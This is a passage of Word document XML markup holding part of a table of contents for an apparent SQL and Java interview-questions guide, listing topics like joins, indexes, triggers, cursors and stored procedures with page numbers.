                <w:webHidden/>
              </w:rPr>
              <w:t>960</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="116B326E" w14:textId="76922B7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9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where and let?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308196 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>960</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="587A5EAE" w14:textId="47AD143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9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View and Index in SQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308197 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>961</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="698F264E" w14:textId="017A482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9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rigger in SQL? What is the use of Trigger in SQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308198 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>963</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33BD6A29" w14:textId="36A3463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19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inner join in SQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308199 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>965</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="049E68FC" w14:textId="63C8A93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0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SQL Qquery - To get emp_sal &gt; 5000 and company_name = "Kotak"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308200 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>966</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C2E46F7" w14:textId="1491B0C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0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rite a JPA query to retrieve the above result?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308201 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>966</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26654D25" w14:textId="58B7A49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0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an index in SQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308202 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>966</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="174D4EFF" w14:textId="012385B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0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different types of index?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308203 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>967</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BDC5C37" w14:textId="55344EB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0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different types of joins?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308204 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>970</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FCA59B6" w14:textId="51CA4F0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0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Outer join and Full outer join?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308205 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>971</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30E069A5" w14:textId="0D86CDE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0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SQL Query - To find the name of a city which has more than one customer in it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308206 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>972</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C41A035" w14:textId="25B99E2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0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SQL Query - 10th highest salary of employee?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308207 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>972</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CABCCBF" w14:textId="3954D63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0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DDL and DML commands?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308208 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>973</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15DA9DC5" w14:textId="777A1D6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0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Inner join and Outer join?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308209 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>973</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7EE35512" w14:textId="2D40FD5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1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left outer join and right outer join?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308210 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>974</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="724390D1" w14:textId="07A10F5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1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are Triggers?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308211 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>975</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="251796BE" w14:textId="55AD101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1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SQL Query - Get the youngest employee from the employee table?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308212 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>975</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14FEB165" w14:textId="746731D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1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SQL Query - Get list of employees from Finance department?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308213 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>975</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09E83647" w14:textId="6159A01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1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Indexing in SQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308214 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>976</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C76F951" w14:textId="31F2088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1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are the disadvantages of Index?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308215 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>976</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B4762C1" w14:textId="2B8BB18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1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Cursor?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308216 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>977</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CA46726" w14:textId="6077DCD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1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implicit cursor and explicit cursor?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308217 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>977</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A15D8F9" w14:textId="0CC305E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1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a correlated subquery?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308218 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>978</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73319CD3" w14:textId="27DAF7E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1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left outer join?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308219 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>979</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="515A38B9" w14:textId="65CC016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2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Stored Procedure? What is the use of stored procedure?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308220 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>980</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D3EE49B" w14:textId="4A45F77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2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the database schema for Students and Course table?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
